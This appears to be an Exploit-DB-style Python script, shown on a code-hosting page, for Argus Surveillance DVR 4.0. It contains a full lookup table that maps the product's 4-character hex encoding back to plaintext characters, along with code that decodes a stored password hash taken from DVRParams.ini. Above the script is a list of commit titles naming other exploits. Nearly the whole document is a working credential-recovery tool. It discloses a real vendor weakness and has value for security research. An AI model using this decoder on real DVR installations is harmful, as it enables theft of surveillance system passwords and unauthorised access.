16b24da825
19 changes to exploits/shellcodes Omnia MPX 1.5.0+r1 - Path Traversal Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) Wavlink WN533A8 - Cross-Site Scripting (XSS) Wavlink WN530HG4 - Password Disclosure Wavlink WN533A8 - Password Disclosure WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download WordPress Plugin Duplicator 1.4.7 - Information Disclosure CuteEditor for PHP 6.6 - Directory Traversal mPDF 7.0 - Local File Inclusion NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
54 lines
No EOL
2 KiB
Python
Executable file
54 lines
No EOL
2 KiB
Python
Executable file
# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
|
|
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
|
|
# Date: 12.07.2021
|
|
# Version: Argus Surveillance DVR 4.0
|
|
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
|
|
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack
|
|
|
|
# Note: Argus Surveillance DVR 4.0 configuration is present in
|
|
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
|
|
|
|
# I'm too lazy to add special characters :P
|
|
characters = {
|
|
'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',
|
|
'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',
|
|
'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',
|
|
'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',
|
|
'8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',
|
|
'7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',
|
|
'8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z',
|
|
'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',
|
|
'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
|
|
'906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
|
|
'7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
|
|
'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'}
|
|
|
|
# ASCII art is important xD
|
|
banner = '''
|
|
#########################################
|
|
# _____ Surveillance DVR 4.0 #
|
|
# / _ \_______ ____ __ __ ______ #
|
|
# / /_\ \_ __ \/ ___\| | \/ ___/ #
|
|
# / | \ | \/ /_/ > | /\___ \ #
|
|
# \____|__ /__| \___ /|____//____ > #
|
|
# \/ /_____/ \/ #
|
|
# Weak Password Encryption #
|
|
############ @deathflash1411 ############
|
|
'''
|
|
print(banner)
|
|
|
|
# Change this :)
|
|
pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"
|
|
if (len(pass_hash)%4) != 0:
|
|
print("[!] Error, check your password hash")
|
|
exit()
|
|
split = []
|
|
n = 4
|
|
for index in range(0, len(pass_hash), n):
|
|
split.append(pass_hash[index : index + n])
|
|
|
|
for key in split:
|
|
if key in characters.keys():
|
|
print("[+] " + key + ":" + characters[key])
|
|
else:
|
|
print("[-] " + key + ":Unknown") |